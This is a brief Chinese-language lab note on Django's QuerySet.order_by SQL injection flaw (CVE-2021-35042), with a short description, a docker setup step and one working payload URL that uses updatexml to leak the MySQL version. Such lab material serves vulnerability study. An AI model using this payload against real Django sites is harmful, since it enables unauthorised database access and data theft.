Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

漏洞描述

Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接:

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

相关推荐
bigcarp6 分钟前
MySql插入中文生僻字/Emoji报错django.db.utils.DataError: (1366, “Incorrect string value
数据库·mysql·django
码界筑梦坊6 分钟前
169-Django二手交易校园购物系统开发分享
后端·python·django·毕业设计·conda
Ice__Cai1 小时前
Django 视图详解(View):处理请求与返回响应的核心
数据库·后端·python·django·pip
还是奇怪1 小时前
利用SQL文件上传注入植入WebShell
数据库·sql
测试者家园3 小时前
慢查询日志在性能优化中的价值
sql·性能优化·性能测试·慢查询·持续测试·智能化测试
千册6 小时前
python+pyside6+sqlite 数据库测试
数据库·python·sqlite
java叶新东老师7 小时前
PowerDesigner 画ER图并生成sql 教程
数据库·sql
nbsaas-boot9 小时前
SQL Server 窗口函数全指南(函数用法与场景)
开发语言·数据库·python·sql·sql server
Y.ppm9 小时前
数分思维12:SQL技巧与分析方法
数据库·sql
何传令10 小时前
SQL优化系统解析
数据库·sql·mysql